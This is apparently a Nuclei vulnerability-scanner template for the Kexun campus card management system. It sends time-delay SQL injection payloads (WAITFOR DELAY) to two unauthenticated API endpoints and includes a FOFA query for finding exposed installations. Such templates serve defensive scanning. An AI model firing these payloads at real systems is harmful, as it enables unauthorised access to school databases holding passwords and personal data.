http:
    - matchers:
        - condition: and
          dsl:
            - duration_1>=4 && duration_1<=5
            - duration_2>=8 && duration_2<=9
          type: dsl
      raw:
        - |
          GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:4%27-- HTTP/1.1
          Host: {{Hostname}}
        - |
          GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:8%27-- HTTP/1.1
          Host: {{Hostname}}
    - matchers:
        - condition: and
          dsl:
            - duration_1>=4 && duration_1<=5
            - duration_2>=8 && duration_2<=9
          type: dsl
      raw:
        - |
          GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A0%3A4%27-- HTTP/1.1
          Host: {{Hostname}}
        - |
          GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A0%3A8%27-- HTTP/1.1
          Host: {{Hostname}}
id: kexunxiaoyuan-get_kq_tj_today-dormitoryHealthRanking-sql
info:
    author: Superhero
    description: |-
        fofa: body="http://www.ahkxsoft.com/" && body="一卡通登录"
        科讯校园一卡通管理系统 get_kq_tj_today、dormitoryHealthRanking等多处接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 科讯校园一卡通管理系统 多处SQL延时注入
    reference:
        - https://superhero.blog.csdn.net/article/details/140709894
    severity: high
    tags:
        - 科讯校园一卡通管理
